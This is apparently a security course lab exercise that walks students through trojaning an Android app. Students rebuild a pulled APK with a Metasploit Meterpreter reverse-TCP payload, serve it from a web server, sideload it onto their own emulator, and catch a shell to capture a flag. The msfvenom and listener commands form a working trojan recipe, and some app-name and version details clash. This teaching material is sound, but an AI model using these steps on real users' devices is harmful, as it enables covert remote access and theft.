M 411: Trojaning an Android App with Metasploit (15 pts)

What You Need for This Project

An Android emulator or device to test the app on
Android Debug Bridge running on Kali
You should have that already set up from previous projects

Purpose

To use Metasploit to add Trojan code to an Android app. This is too easy :)

Task 1: Prepare the Phone

Install Firefox

On your Android device, in Google Play, install Firefox, so you have a fully functional browser.

Open Settings. Click "Apps & notifiations", "App info", Firefox.

Scroll down and allow "Install unknown apps", as shown below.

Install an App to Trojan

On your Android device, in Google Play, install an app. This worked for the apps shown below on Feb 17, 2021. If you try other apps, it may or may not work--I had a success rate of 6/39 with this process.

I will use USA Today for the instructions below. If you are using a different app you'll have to adjust the commands to refer to the correct app name.

You can also use my archived copy of the apps:

usatoday.apk
kayak.apk
UCH.apk
wsj.apk
waze.apk

duck.apk

Task 2: Prepare the Malware with Kali

Connecting to your Android Device with ADB

On Kali, in a Terminal, execute these commands, replacing the IP address with the IP address of your Genymotion or Nox Android device:

adb connect 172.16.123.154 adb devices -l

You should see your Genymotion device in the "List of devices attached", as shown below.

Upgrading Apktool

For this project, you need the latest version of Apktool, which was 2.4.0 when I did it, on March 15, 2019.

On Kali, execute these commands:

sudo apt purge apktool -y wget https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.5.0.jar mv apktool_2.5.0.jar apktool.jar sudo mv apktool.jar /usr/bin sudo mv apktool /usr/bin sudo chmod +x /usr/bin/apktool* apktool

You should see the "Apktool v2.5.0" help message, as shown below.

Pull the App from the Phone

On Kali, in a Terminal, execute these command to find the name of the installed "Whatsapp" package, find its location, and pull it from the phone.

The commands may need some adjustment to work on your system. You need the output of each command to know what to put in the next one.

adb shell pm list packages | grep what adb shell pm path com.whatsapp adb pull /data/app/com.whatsapp-4ecBR8w_r7bateDGMM9YPg==/base.apk

The app should download, as shown below.

Adding Trojan Code to the App

On Kali, execute this command to see the Android payloads available in Metasploit.

msfvenom -l payloads | grep android

There are only a few payloads available, as shown below.

On Kali, execute this command to find your IP address.

ifconfig

When I did it, the address was 172.16.123.180, as shown below.

On Kali, execute this command to generate the malware, replacing the IP address with your Kali systems IP address:

msfvenom -x base.apk -p android/meterpreter/reverse_tcp LHOST=172.16.123.180 -f raw -o usapwned.apk

The malware is generated, as shown below.

On Kali, execute these commands to start a Web server and host your malicious app:

service apache2 start sudo cp usapwned.apk /var/www/html

Starting a C&C Server

On Kali, in a Terminal, execute these commands, to start a listener:

msfconsole -q use multi/handler set payload android/meterpreter/reverse_tcp set LHOST 0.0.0.0 exploit

Metasploit begins listening on port 4444, as shown below.

Task 3: Installing Malware on the Phone

Removing the Genuine App

On your Android device, in Google Play, search for the app you are using.

Click UNINSTALL. Click OK.

Installing the Trojaned App

On your Android device, open Firefox and enter the IP address of your Kali machine. A default Apache page opens, as shown below.

Add the APK filename to the end of the IP address, as shown below. Your IP address will be different.

172.16.123.180/usapwned.apk

If a box pops up asking to "Allow Firefox to access photos, media...", click ALLOW.

Click Download.

Click Open.

Install the app. Open the app.

Task 4: Post-Exploitation

On Kali, you should see an open Meterpreter session, as shown below.

Flag M 411.1: Working Directory (15 pts)
In the meterpreter shell, execute this command:
pwd
The flag is the word covered by a green rectangle in the image below.

Defense: Antivirus

As on Windows, Metasploit payloads are easily detected by antivirus software. Here's Avast finding the malware.

References

Lab: Hacking an Android Device with MSFvenom

Posted 3-15-19 by Sam Bowne
-y added to purge command 3-19-19
Updated 2-18-21